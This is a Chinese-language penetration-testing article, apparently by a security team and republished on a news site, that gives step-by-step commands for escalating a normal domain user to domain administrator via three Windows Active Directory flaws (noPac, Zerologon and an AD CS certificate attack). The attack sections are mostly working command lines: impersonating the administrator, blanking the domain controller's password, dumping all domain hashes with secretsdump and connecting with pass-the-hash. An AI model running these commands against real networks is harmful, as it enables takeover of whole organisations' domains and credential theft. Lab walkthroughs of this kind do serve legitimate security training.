Redian新闻
>
横向移动-域控提权

横向移动-域控提权

科技

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担!


CVE-2021-42287

由于Active Directory没有对域中计算机和服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码。

利用条件

前提条件:一个域内普通账号 影响版本:Windows基本全系列

漏洞复现

当前场景如下,目前已经获得了Web Server的主机权限和webadmin这个域成员的账号和密码,来使用CVE-2021-42287漏洞来攻击域控主机 这里我们可以使用nopac脚本来进行利用 在攻击前先将该域名和IP地址绑定在hosts中

检测是否存在漏洞

noPac.exe scan -domain god.org -user webadmin -pass admin!@#45

漏洞存在,接下来我们使用域普通用户的TGT,利用漏洞请求TGS申请域控机器账户 cifs服务的ST凭证

noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org --impersonate administrator -dump -use-ldap

生成票据后我们再来查看一下当前电脑上所存在的票据

klist 

发现有一条和域控建立的票据,这里我们直接使用psexec连接即可

PsExec \\owa2010cn-god.god.org cmd

CVE-2020-1472

CVE-2020-1472是一个windows域控中最严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限

首先先获取域控的计算机名

net group "domain controllers" /domain

然后使用测试脚本去检测该域控是否存在漏洞

python zerologon_tester.py owa2010cn-god 192.168.3.21

然后使用exp连接DC清空凭证

python cve-2020-1472-exploit.py OWA2010CN-GOG 192.168.3.21

执行后,会将DC的密码置空,然后我们再使用空密码连接将域内的HASH导出出来

secretsdump.exe "god.org/[email protected]" -no-pass

这时我们在使用域控的hash去进行PTH连接,拿到域控权限

wmiexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/admin

CVE-2022-26923

该漏洞允许低权限用户在安装了Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升为域管理员。现在已经很少没有安装AD CS的大中型Active Directory环境,所以该漏洞危害和利用性都较强。

利用条件

前提条件:

  1. 域内普通账号
  2. 域内存在证书服务器

影响版本:win8.1、win10、win11、Windows Server 2012 R2、Windows Server2016、Windows Server2019、Windows Server2022等版本

环境搭建

首先准备一台已搭建域服务的主机,这里选择Windows Server 2012R2版本。因为这个漏洞基于证书服务,所以需要DC中安装Active Directory证书服务。点击添加角色和功能,默认下一步直到下图,选择安装Active Directory证书服务:下一步到角色服务中,勾选证书颁发机构、证书颁发机构web注册、证书注册策略Web服务点击安装即可

安装完成后需要配置Active Directory证书服务,在服务器管理器中单击该选项。选择刚刚安装时所勾选的三个服务后默认下一步到CA名称中配置CA证书后,下一步到服务器证书在服务器证书中,选择证书并稍后为SSL分配,点击下一步下一步配置查看是否配置成功:在证书颁发机构中查看是否存在证书模板该漏洞的利用条件为获得一个域内普通用户权限,所以需要在DC上创建一个用户,之后便会使用这个用户的凭据进行域控提权操作。

漏洞利用

获取CA名称

目前我们的已知信息

域控Win 2012
    IP:192.168.45.152
    主机名:DC-2012
域名:tidesec.local
用户:test/Pass123

接下来第一步我们需要获取该域内的CA名称

  1. 任意域内主机查询
 查看是否存在证书驱动器
Get-PSDrive cert | ft -AutoSize

 列出本地机器账户的证书
Get-ChildItem Cert:\LocalMachine\Root
  1. 域控上查询
certutil
certutil -config - -ping

3. 合理猜测 根据域控主机名和域名进行猜测

域控主机名:DC-2012
域名:tidesec.local
CA名称:tidesec-DC-2012-CA

申请证书

在申请证书前,需要先修改一下我们攻击机的hosts文件,将域名和ip地址对应一下

vim /etc/hosts
192.168.45.152 tidesec.local
192.168.45.152 tidesec-DC-2012-CA
192.168.45.152 DC-2012.tidesec.local

这里需要使用到certipy工具,在使用前先进行安装

python3 setup.py install

安装后使用我们刚刚所获得的低权限用户、CA名、域控计算机名来生成一个证书

certipy req tidesec.local'test:Pass123'@DC-2012.tidesec.local -ca tidesec-DC-2012-CA -template User

申请ceshi用户证书账号成功后,执行命令来验证该证书,获取其NT hash值

    certipy auth -pfx test.pfx

成功获取到了NT hash,说明测试环境没有问题,接下来需要使用bloodyAD来新建一个机器账号 在新建账号前我们先观察一下,当前域控下的Computers下是没有账号的,接下来新建一个

    python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 addComputer test2 'Test12345' 

这时再来观察下域控中成功添加了一个test2的机器账户,接下来设置其dNSHostName 属性为域控服务器属性

python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 setAttribute 'CN=test2,CN=Computers,DC=tidesec,DC=local' dNSHostName '["DC-2012.tidesec.local"]'

接下来我们再用刚新建的机器账号test2去申请证书,其实是申请的域控DC$的证书

certipy req 'tidesec.local/test2$:[email protected]' -template Machine -dc-ip 192.168.45.152 -ca tidesec-DC-2021-CA

可以看到此时的证书不是test.pfx,是主机名dc-2012.pfx,颁发的是域控制器的计算机账户证书,。接下来我们使用该证书进行认证,Certipy工具检索到了DC-2012$的NTLM hash。

certipy auth -pfx dc-2012.pfx -dc-ip 192.168.45.152

然后我们可以使用impacket工具包中的secretsdump.py脚本来执行DCSync攻击,导出域内用户Hash

python3 secretsdump.py 'tidesec.local/[email protected]' -hashes :20d4bd2f70725811f4e39fe77166e00b

之后在使用wmiexec.py脚本去获得域控账户的执行权限

python3 wmiexec.py tidesec.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7


往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
“比新冠还难受!”一地暴发急性传染病!疾控提醒:感染后千万别吃布洛芬“卡努”强度缓慢减弱,今夜明天离上海最近,明傍晚到夜间加速向东北方向移动宇宙人(1296期)2023移动互联网蓝皮书:卫星通信进入移动通信发展主航道;NASA的LCRD双向激光中继系统在轨实验满一年数字资产,数字货币,过去以及未来不是二阳,已有人在家昏迷!多地疾控提醒:这种传染病重可致命!戴尔推出 Precision 5480 / 5680 轻薄移动工作站,起售价 39349 元 / 42930 元该国宣布向移居者发$9.2万,但有一些条件降价60%!移动云加入价格战?《母亲遗留的“财富”》-- 紫竹大量澳洲华人反向移民!中国父母带孩子回国,嫌弃澳洲教育质量!移民也不让娃在澳洲上学万水千山 一起走遍: 台湾“卡努”已转向东北方向移动并减弱为台风级,上海今明有分散性阵雨或雷雨“二阳”来了?戴口罩!戴口罩!厦门疾控提醒!​AAAI 2023 | TS-TrajGen: 基于城市个体移动模式感知的出行轨迹生成方法OpenAI推出ChatGPT iOS移动版针对人偏肺病毒,中疾控提醒→北京发现两例猴痘病例!疾控提示“欧洲火药桶”又有新情况!武契奇下令:军队进入最高战备状态,紧急向这一方向移动中国移动是怎么讲述中国品牌故事的?峰智睿联获千万元天使轮融资,聚焦动力域控制器|36氪首发“卡努”预计4日夜间到5日加速向东北方向移动,上海今明有分散性阵雨或雷雨初涉内网,提权那些事(小白适用)请注意!全国紧急移动警报系统测试即将开始,关乎新西兰境内所有人的生命安全!律所招人tips——如何“优雅地”横向招聘?深圳手足口疫情升至中风险:多地疾控提示进入流行期,如何防范《卫报》优化了移动推送通知投递架构智驾域控新战争打响,谁在抢跑?菲律宾至少225人死亡!暴雨加速这种疾病传播,我国多地疾控提醒→座舱域控进入“上车”加速期,中国芯片的狂飙时代来了?“卡努”强度缓慢下降,预计将于4日转向东北方向移动峰智睿联获千万元天使轮融资,聚焦动力域控制器|早起看早期放假啦海涅:焚书的地方,最终也会烧人智能电动「唱主角」,哪些供应商在「领跑」智驾域控制器赛道阿里云、腾讯云、移动云纷纷降价,释放哪些重要信号?
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。